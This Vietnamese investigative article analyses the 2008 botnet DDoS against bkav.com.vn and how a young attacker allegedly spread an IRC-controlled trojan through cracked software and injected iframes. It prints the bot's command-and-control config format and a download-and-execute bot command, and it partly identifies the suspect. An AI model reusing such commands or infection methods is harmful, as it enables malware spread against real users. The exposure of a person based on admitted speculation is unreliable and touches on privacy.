ĐIỀU TRA VỤ BOTNET HTTP://WWW.BKAV.COM.VN


Tất cả những thông tin dưới đây đều ra những suy đoán và dựa vào quá trình tìm hiểu của nhóm! Nhóm sẽ không chịu bất cứ trách nhiệm nào về tính xác thực của thông tin nêu dưới đây!

Đồng thời nhóm vietnamsecurity cũng muốn cảnh báo đến giới cntt về làn sóng sử dụng botnet ở Việt Nam hiện nay, bởi vì rất khó có thể chổng đỡ một cách hiệu quả và rất khó tìm ra thủ phạm nếu họ thật sự muốn ẩn mình! Khi có dấu hiệu bị tấn công cần thông báo ngay đến cơ quan chức năng!

 

 Đầu tiên chúng ta sẽ làm rõ các khái niệm:

  1. DDOS
  2. BOTNET
  3. mIRC

Kẻ tấn công vừa bị bắt theo thông tin trên báo là một học sinh trung học ở Quảng Nam. Vậy làm sao một học sinh trung học có thể huy động nhiều máy tính để tấn công được BKAV.com.vn, chúng ta sẽ cùng nhau phân tích:

Nhận thông tin:

Vào ngày chủ nhật 5/10/2008 khi đang ở nhà, tôi truy cập  vào trang bkav.com.vn để down phần mềm diệt virus về diệt virus cho máy laptop người thân, tuy nhiên tôi không thể nào truy cập vào trang bkav.com.vn. Một lát sau tôi liên tục nhận được thông tin website http://www.bkav.com.vn bị tấn công botnet, đến chiều hôm đó tôi đăng tin lên trang http://vietnamsecurity.googlepages.com, ngày hôm sau các báo bắt đầu đăng tin và phỏng vấn BKIS về vụ việc tuy nhiên bkis đã phủ nhận tất cả thông tin và đính chính là vụ việc trên chỉ là hoạt động nâng cấp thường nhật của BKAV.

Sau đây là những hình ảnh chụp được ngày 5/10:


Tuy nhiên, tôi vẫn tiếp tục nhận được thông tin bkav bị ddos, website bkav.com.vn tiếp tục hoạt động chập chờn và thậm chí có lúc không truy cập vào được trong thời gian dài! đến lúc này thì thông báo việc nâng cấp của bkav không còn hợp lý nữa, nó củng cố thêm thông tin cho là bkav.com.vn bị tấn công botnet. Sau đây là những hình ảnh cập nhật sau đó:



Đồng thời vào 17h ngày 7/10 tôi lại nhận được những hình ảnh chụp màn hình được cho là hình ảnh tấn công trang bkav.com.vn và một file có tên là BKAV.exe ( được cho là file tấn công bkav.exe)




Đồng thời trên mạng cũng xuất hiện các thông tin cho rằng có một người đã dùng các chèn mã độc vào các bản crack BKAV pro, các bản auto game và chèn iframe vào các website lớn để từ đó xây dựng mạng botnet để tấn công http://www.bkav.com.vn

Tìm thông tin

Sau khi nhận thông tin và phản hồi từ các báo chí và bạn bè,  tôi tiến hành điều tra sự việc!

Tôi tìm bắt tìm thông tin về các hacker hay sử dụng botnet, các loại botnet phổ biến ở Việt Nam, tìm các các diễn đàn lớn đã bị tấn công trong thời gian qua để tìm manh mối! đồng thời nhờ người có kinh nghiệm tiến hành thử nghiệm và phân tích cơ chế hoạt động của của file BKAV.exe.

Kết quả là tôi cũng tìm được một số manh mối:

Sau khi phân tích file BKAV.exe cho thấy đây là một loại virus nội, đã được đưa vào danh sách virus của BKAV, thông tin thêm:

http://bkav.com.vn/thong_tin_virus/13/08/2008/3/1755/

đồng thời tìm kiếm trên các forum lớn, tôi tìm được các thông tin sau:


đây là đoạn mã chèn file vào website, cụ thể ở đây là 4gamevn.com, cơ chế của nó là tự download file trojan.exe về máy người dùng và thực thi. Thông tin này càng lý giải  cho việc làm sao một học sinh trung học có thể xây dựng một mạng lưới bot net với tầm hơn 100 ngàn victim!

Sau khi download file trojan.exe về, tôi tíên hành dịch ngược và may mắn có được email của người viết con trojan này! Tuy nhiên vẫn chưa có được chứng cứ cụ thể về vụ việc tấn công BKAV. Từ địa chỉ email đó tôi bắt đầu tìm được những thông tin cá nhân của kẻ tấn công, hình ảnh, các forum người này tham gia! nó có email là: Linh_XXX@yahoo.com , từ đó tôi vào blog, đồng thời cũng biết được níck trên mạng của kẻ đó là LLY. . ., một tay chơi botnet còn khá nhỏ tuổi ở Việt Nam, tôi bắt đầu tìm hiểu cách xây dựng mạng Botnet của Lly. . .

Câu chuyện hé mở:

Qua tìm hiểu cho thấy kẻ tấn công còn trẻ tuy nhiên có sự nghiên cứu về botnet, cc chùa, và biết lập trình!

Lly… đã viết cho mình một chương trình botnet mới dựa trên nền tảng mIRC để điều khiển các victim. Sau đó lly… đã cài con virus này vào các chương trình chơi auto game, chương trình crack Bkpro (chưa tìm ra phiên bản để kiểm chứng), đồng thời dựa vào các mối quan hệ với các tay chơi botnet khác kiếm shell trên các diễn đàn lớn, đông lựơt truy cập để cài iframe vào các diễn đàn đó, thậm chí có thể lly đã cài vào chính diễn đàn về âm nhạc và giải trí mà lly đang quản lý!

Sau khi victim bị nhiễm vào máy sẽ thự động nhận lệnh từ một file có trên website của kẻ tấn công: http://www.xxx.net/server/php nội dung của file này có dạng như sau:

[Server] server=irc. port=6667 chan=#zz ver=3 IP=58.xxx.xxx.xxx

với các thông số:

Server: đây là server irc để victim connect vào! vậy tại sao ở đây chỉ là irc? Đó chính là vì kẻ tấn công muốn bình thường victim không thể connect tới server được, khi nào kẻ tấn công chỉnh lại file server.php thì victim mới connect vào!


 

Port:6667 là port mặt định của IRC

Chan: đây là room mà kẻ tấn công sẽ tạo ra để điều khiển các victim

Ver=3: là version của virus botnet này, có nó chức năng tự động cập nhật khi phiên bản trong máy victim cũ!

IP=58.xxx.xxx.xxx: đây là ip của kẻ tấn công

Sau khi nhận lệnh từ file server.php, máy của vitim sẽ tự động connect tới server IRC.nhac…..vn và join vào room ZZ

Kẻ tấn công đã khéo léo viết chương trình botnet nhận lệnh từ mIRC

Cấu trúc câu lệnh như sau:

!lly… download http://www.xxx.vn/bkav.exe c:\a.exe 1

Ý nghĩa của nó là sẽ tự động download file bkav.exe từ server về máy victim và tự động thực thi! File bkav.exe có nhiệm vụ là ghi vào regstry những biến để liên tục ping đến server bkav.exe gây ra cuộc tấn công từ chối dịch vụ!




vậy khi cần thực hiện cuộc tấn công, lly.. chỉ cần connect vào mạng mIRC và gõ vài câu lệnh!

 Tôi chỉ có lời khuyên chân thành đến những bạn trẻ đang ham mê con đường xây dựng các mạng botnet rằng việc đó chỉ phí thời gian, gây hại cho xã hội và sẽ bị cộng đồng lên án! hãy dừng lại trước khi quá muộn, đừng để những ham muốn nhất nhất thời làm hại đến tương lai của mình!

bài phân tích do nhóm Vnsecurity.info thực hiện!